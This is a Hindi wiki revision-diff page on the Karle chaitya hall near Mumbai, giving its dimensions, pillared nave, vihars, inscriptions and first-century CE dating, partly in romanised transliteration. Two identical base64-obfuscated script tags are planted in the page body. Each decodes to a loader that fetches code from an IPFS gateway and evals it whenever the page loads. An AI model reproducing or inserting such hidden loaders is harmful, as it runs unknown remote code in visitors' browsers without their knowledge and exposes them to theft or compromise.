Difference between revisions of "कार्ले चैत्यगृह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "दरवाजे" to "दरवाज़े")
Line 3: Line 3:
 
*यह [[चैत्यगृह]] दोनों तरफ़ सीधी रेखा में बने स्तम्भों के लिए प्रसिद्ध है।
 
*यह [[चैत्यगृह]] दोनों तरफ़ सीधी रेखा में बने स्तम्भों के लिए प्रसिद्ध है।
 
*इस विशाल चैत्यगृह में तीन विहार भी हैं।
 
*इस विशाल चैत्यगृह में तीन विहार भी हैं।
*इसमें आगे का भाग दो मंजिला है, और नीचे के हिस्से में तीन दरवाजे हैं।
+
*इसमें आगे का भाग दो मंजिला है, और नीचे के हिस्से में तीन दरवाज़े हैं।
 
*ऊपर एक बरामदा है, जिसमें एक विशाल चैत्य गवाक्ष है।
 
*ऊपर एक बरामदा है, जिसमें एक विशाल चैत्य गवाक्ष है।
 
*[[चैत्यगृह]] के अन्दर एवं बाहर कई अभिलेख अंकित है।
 
*[[चैत्यगृह]] के अन्दर एवं बाहर कई अभिलेख अंकित है।

Revision as of 05:25, 10 December 2012

[[chitr:Ajanta-Caves-Aurangabad-Maharashtra-2.jpg|thumb|250px|karle chaityagrih, ajanta ki gufaean, aurangabad]] karle chaityagrih 1900 varsh poorv khodakar mumbee ke nikat banaya gaya tha. is chaityagrih ki lambaee 38.25 mitar, chau daee 15.10 mitar tatha ooanchaee 14.50 mitar hai.

  • yah chaityagrih donoan taraf sidhi rekha mean bane stambhoan ke lie prasiddh hai.
  • is vishal chaityagrih mean tin vihar bhi haian.
  • isamean age ka bhag do manjila hai, aur niche ke hisse mean tin daravaze haian.
  • oopar ek baramada hai, jisamean ek vishal chaity gavaksh hai.
  • chaityagrih ke andar evan bahar kee abhilekh aankit hai.
  • isi adhar par isake nirman ka samay pratham shatabdi ee. ka prarambhik charan mana jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>